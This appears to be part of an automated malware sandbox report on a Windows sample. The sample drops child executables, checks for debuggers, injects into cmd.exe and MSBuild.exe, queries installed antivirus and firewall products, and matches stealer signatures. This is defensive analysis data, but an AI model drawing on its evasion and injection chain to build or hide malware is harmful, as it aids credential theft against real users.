                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00416240
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04213C4E mov eax, dword ptr fs:[00000030h]0_2_04213C4E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04200D90 mov eax, dword ptr fs:[00000030h]0_2_04200D90
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420092B mov eax, dword ptr fs:[00000030h]0_2_0420092B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042EDB7B push dword ptr fs:[00000030h]0_2_042EDB7B
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00415DC0 mov eax, dword ptr fs:[00000030h]2_2_00415DC0
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 4_2_0040F124 mov eax, dword ptr fs:[00000030h]4_2_0040F124
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00420C1A GetProcessHeap,0_2_00420C1A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04209CDA
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209E6D SetUnhandledExceptionFilter,0_2_04209E6D
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0420A125
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042109A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_042109A2
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00419DC7 SetUnhandledExceptionFilter,2_2_00419DC7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00417B4E
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004173DD
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C77B66C
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C77B1F7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C92AC62
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x456867
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0xFC5BE4
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6C158C4C
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x6C432BA4
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6CCB8C4C
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0x3A5BE4
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00415D00
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A551000
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10A6008
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A551000
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 855008
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe "C:\Users\user\AppData\Local\Temp\u3z0.0.exe"
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe"
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe "C:\Users\user\AppData\Local\Temp\u3z0.1.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420063
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_004208CE
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004170F1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042099B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004202DB
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_00420326
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004203C1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042044E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_004174E4
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_0042069E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004207C7
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_04220C02
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04220542
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_0422058D
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04220628
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_0421774B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220903
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220905
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_04220A2E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_042202CA
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220B35
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04217358
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00414570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\e7b0f02f VolumeInformation
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_004143C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_004144B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED
                            Source: Yara matchFile source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
